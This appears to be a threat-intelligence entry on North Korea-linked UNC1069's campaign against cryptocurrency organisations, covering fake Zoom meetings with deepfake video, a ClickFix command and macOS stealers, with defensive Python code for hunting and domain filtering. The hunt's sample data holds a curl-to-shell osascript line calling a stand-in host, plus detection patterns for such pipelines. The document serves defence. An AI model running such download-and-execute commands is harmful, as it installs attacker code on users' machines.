
North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations

Severity: Medium
Tags: Vulnerability, windows, macos
Published: Wed Feb 11 2026 (02/11/2026, 06:50:00 UTC)
Source: The Hacker News

Description

The North Korea-linked threat actor known as UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the ultimate goal of facilitating financial theft. "The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated

AI-Powered Analysis

Last updated: 02/11/2026, 12:14:44 UTC

Technical Analysis

UNC1069 is a North Korea-linked threat actor active since at least 2018. In this campaign it targets the cryptocurrency sector, stealing credentials and sensitive data from Windows and macOS systems to enable financial theft. Victims are concentrated among cryptocurrency startups, software developers, venture capital firms and high-tech companies.

The intrusion opens with social engineering over Telegram: a compromised or impersonated account invites the target to a meeting hosted on a phishing domain that mimics a legitimate Zoom URL. The fake meeting plays AI-generated or deepfake video to simulate a live call, prompting the victim to enable their camera and enter personal details. The page then shows a fabricated error message and instructs the victim to run a ClickFix-style "troubleshooting" command to restore audio or video.

On macOS that command executes an AppleScript which drops a malicious Mach-O binary, WAVESHAPER. WAVESHAPER collects system information and stages further malware: HYPERCALL (a Go downloader), HIDDENCALL (a Go backdoor), DEEPBREATH (a Swift data miner that bypasses macOS Transparency, Consent, and Control (TCC) protections to read iCloud Keychain and browser data), SUGARLOADER (a C++ downloader), CHROMEPUSH (a C++ browser-extension stealer with keylogging and cookie theft) and SILENCELIFT (a minimalist backdoor).

Together these tools harvest credentials, session tokens and other sensitive data from Chrome, Brave and Edge, from Telegram and from Apple Notes, giving the operators what they need to drain cryptocurrency accounts. The reported use of AI both for lure creation and in malware development marks a step up in UNC1069's operational sophistication: social engineering, AI-assisted deception and multi-stage malware are combined to maximize the payoff from a small number of high-value victims.
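The macOS leg of the chain above boils down to one observable: an osascript one-liner, pasted by the user into a terminal, that pulls a stage from the network and executes it. The following hunt over process telemetry is an added example for this page and is not code from The Hacker News article or from the researchers tracking UNC1069. The event schema (ts, pid, ppid, process, args), the trait names and the sample events are constructed assumptions; map the fields onto whatever your EDR actually exports.

```python
"""Hunt for a ClickFix-style execution chain in macOS process telemetry.

Added example for this page; not code from the article or from the
researchers who tracked UNC1069. The event schema and the sample events
below are constructed assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: float      # seconds since epoch
    pid: int
    ppid: int
    process: str   # image name, e.g. "osascript"
    args: str      # full command line


# Interactive hosts a user pastes a "fix this error" command into.
USER_SHELL_HOSTS = {"Terminal", "iTerm2", "zsh", "bash", "sh"}

# Traits of the chain the analysis describes: an osascript one-liner that
# fetches a stage from the network and executes it from a writable path.
SUSPICIOUS_TRAITS = [
    ("osascript_inline", re.compile(r"\bosascript\b.*\s-e\s")),
    ("do_shell_script", re.compile(r"\bdo shell script\b")),
    ("download_pipe_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("base64_decode", re.compile(r"\bbase64\b.*(-d\b|--decode\b|-D\b)")),
    ("exec_from_tmp", re.compile(r"\bchmod\s+\+x\s+(/tmp/|/private/tmp/|/var/folders/)")),
]


def ancestry(event, by_pid, max_depth=4):
    """Process names from the event up to its oldest tracked ancestor."""
    chain = [event.process]
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            break
        chain.append(parent.process)
        cur = parent
    return chain


def hunt(events):
    """Return one finding per event that shows ClickFix traits.

    Confidence is "high" when an interactive shell host is in the ancestry
    (the user pasted the command) and "medium" otherwise, e.g. a LaunchAgent
    replaying the same one-liner for persistence.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in sorted(events, key=lambda x: x.ts):
        reasons = [name for name, pat in SUSPICIOUS_TRAITS if pat.search(e.args)]
        if not reasons:
            continue
        chain = ancestry(e, by_pid)
        pasted = any(p in USER_SHELL_HOSTS for p in chain[1:])
        findings.append({
            "pid": e.pid,
            "process": e.process,
            "chain": " <- ".join(chain),
            "reasons": reasons,
            "confidence": "high" if pasted else "medium",
        })
    return findings


# Constructed sample telemetry (not from the article): a pasted osascript
# one-liner under Terminal, plus benign osascript and curl uses.
SAMPLE_EVENTS = [
    ProcEvent(1.0, 100, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(1.5, 101, 100, "zsh", "-zsh"),
    ProcEvent(2.0, 102, 101, "osascript",
              "osascript -e 'do shell script \"curl -fsSL https://zoom-fix.invalid/fix.sh | sh\"'"),
    ProcEvent(3.0, 200, 1, "launchd", "/sbin/launchd"),
    ProcEvent(3.5, 201, 200, "osascript", "osascript /Library/Scripts/nightly_backup.scpt"),
    ProcEvent(4.0, 300, 101, "curl", "curl -sS https://api.github.com/repos/example/example/releases -o r.json"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["confidence"], f["pid"], f["chain"], f["reasons"])
```

The traits are deliberately behavioural rather than hash- or domain-based: the phishing domains and payload names change per victim, but "osascript -e" plus a download piped into a shell, launched under a terminal the user just opened, is the shape of every ClickFix run. Tune the ancestry depth to how your EDR reports parent PIDs, and expect to whitelist a few developer tooling one-liners.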

Potential Impact

European organizations in the cryptocurrency ecosystem face significant risks from UNC1069’s campaign. The theft of credentials, session tokens, and sensitive data can lead to direct financial losses through unauthorized cryptocurrency transfers or theft. Compromise of software developers and venture capital firms could result in intellectual property theft, disruption of funding activities, and reputational damage. The use of AI-generated lures and deepfake videos increases the likelihood of successful social engineering, making detection and prevention more challenging. The multi-platform nature of the attack (Windows and macOS) broadens the scope of affected systems. The campaign’s stealthy backdoors and data stealers can persist undetected, enabling prolonged espionage and financial fraud. For European financial and tech sectors, this threat could undermine trust in cryptocurrency markets and impact regulatory compliance, especially under GDPR due to potential data breaches. The sophistication and targeted nature of the attack suggest it is designed for high-value victims, increasing the potential for significant economic and operational disruption.

Mitigation Recommendations

European organizations should layer defenses around the specific tactics of this campaign rather than rely on generic controls:

1. User awareness. Train staff, especially anyone who takes meetings arranged over Telegram, to recognise AI-generated and deepfake video lures, and to treat any "fix this error by running a command" prompt from a meeting page as an attack. A legitimate Zoom client never asks the user to paste a command into Terminal or a Run dialog.

2. URL filtering. Enforce domain reputation checks and block lookalike domains that carry the Zoom brand outside Zoom's own registrable domains, since the fake meetings are hosted on domains mimicking legitimate Zoom URLs.

3. Endpoint detection. Deploy EDR on macOS and Windows that alerts on osascript one-liners and download-and-execute shell pipelines spawned from a terminal, on unsigned Mach-O binaries executing from user-writable paths, and on the Windows equivalent of a pasted command. The ClickFix step is the one moment where the user, not the malware, is the executor, so a Terminal-spawned downloader is a high-fidelity signal.

4. Execution control. Apply application allow-listing and restrict execution of unapproved scripts and binaries so that dropped stages such as WAVESHAPER do not run even if a user is talked into pasting the command.

5. Network monitoring. Watch for connections to known or suspicious command-and-control infrastructure associated with the UNC1069 malware families, and for downloads initiated by scripting hosts.

6. Authentication. Require multi-factor authentication on all cryptocurrency-related accounts and internal systems. Note the caveat: CHROMEPUSH-style cookie and session-token theft sidesteps MFA once a session exists, so pair MFA with phishing-resistant authenticators (FIDO2 or passkeys), short session lifetimes, and the ability to revoke sessions quickly when a compromise is suspected.

7. TCC hygiene. Regularly review which applications hold Full Disk Access, Accessibility and similar grants in macOS Transparency, Consent, and Control, manage those grants centrally through MDM privacy profiles, and alert on unexpected changes, since DEEPBREATH is reported to bypass TCC to reach iCloud Keychain and browser data.

8. Threat hunting. Hunt for indicators of compromise tied to WAVESHAPER, DEEPBREATH, CHROMEPUSH and the other components, and for the behavioural traces of the ClickFix step on macOS endpoints.

9. Intelligence sharing. Participate in threat intelligence sharing communities to stay current on UNC1069 tactics and indicators.

10. Incident response. Maintain an incident response plan that specifically covers social engineering and multi-stage malware attacks against cryptocurrency assets, including immediate key rotation and session revocation for affected wallets and exchange accounts.
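The URL-filtering recommendation above needs a concrete rule for "a domain mimicking Zoom". The check below is an added example for this page, not code from the article or from any filtering product. The trusted domain set, the brand keyword, the edit-distance threshold and the sample URLs are constructed assumptions; the registrable-domain logic is a simplification that a production filter should replace with the Public Suffix List.

```python
"""Lookalike-domain check for URL filtering around video-call invites.

Added example for this page, not code from the article or from any
vendor product. LEGIT_DOMAINS, BRAND_KEYWORDS and the sample URLs are
constructed assumptions.
"""
from urllib.parse import urlsplit

# Assumption: registrable domains your users are allowed to join calls on.
LEGIT_DOMAINS = {"zoom.us", "zoom.com"}
BRAND_KEYWORDS = ("zoom",)
NEAR_MISS_EDITS = 2  # edit distance that still counts as a typosquat


def registrable_domain(host):
    """Last two labels of the host.

    Simplification: a real filter should use the Public Suffix List so
    that suffixes such as co.uk are handled correctly.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else labels[0]


def decode_idna(host):
    """Turn punycode labels (xn--...) back into Unicode so that homoglyph
    domains are compared against the Latin brand string."""
    out = []
    for label in host.split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass  # malformed label: leave it as-is, it will not match
        out.append(label)
    return ".".join(out)


def levenshtein(a, b):
    """Classic edit distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url):
    """Return (verdict, reason); verdict is "allow", "block" or "review"."""
    parts = urlsplit(url if "://" in url else "//" + url)
    host = decode_idna((parts.hostname or "").lower())
    if not host:
        return ("block", "no host in URL")
    reg = registrable_domain(host)
    if reg in LEGIT_DOMAINS:
        return ("allow", reg)
    # Brand name anywhere in a host whose registrable domain is not trusted:
    # zoom-us.com, us05web-zoom.us.example.com, zoom.us.verify.example
    if any(k in host for k in BRAND_KEYWORDS):
        return ("block", "brand keyword under untrusted domain " + reg)
    # Near miss of a trusted domain: zo0m.us, or Cyrillic o in zoom.us
    for legit in sorted(LEGIT_DOMAINS):
        d = levenshtein(reg, legit)
        if 0 < d <= NEAR_MISS_EDITS:
            return ("review", "%d edit(s) from %s" % (d, legit))
    return ("allow", reg)


# Constructed sample invites (not from the article).
SAMPLE_URLS = [
    "https://us05web.zoom.us/j/123456789",          # genuine subdomain
    "https://zoom-us.com/j/123456789",               # brand in untrusted domain
    "https://us05web-zoom.us.example.com/j/1",       # brand as a subdomain label
    "https://zo0m.us/j/1",                           # digit-for-letter typosquat
    "https://example.com/zoom",                      # brand only in the path
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(classify_url(u), u)
```

The brand-keyword rule is the one that matters for this campaign: the lure domains look like Zoom URLs, so any host carrying the brand outside Zoom's own registrable domains is blocked outright. The edit-distance rule is noisier (it will also surface unrelated short domains one or two characters away from zoom.us), which is why it returns "review" rather than "block"; lower NEAR_MISS_EDITS to 1 if the review queue is too busy.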


Technical Details

Article Source
URL: https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html (fetched 2026-02-11T12:13:29.662Z, 1420 words)

Threat ID: 698c726b4b57a58fa193ba9e

Added to database: 2/11/2026, 12:13:31 PM

Last enriched: 2/11/2026, 12:14:44 PM

Last updated: 2/11/2026, 2:41:18 PM


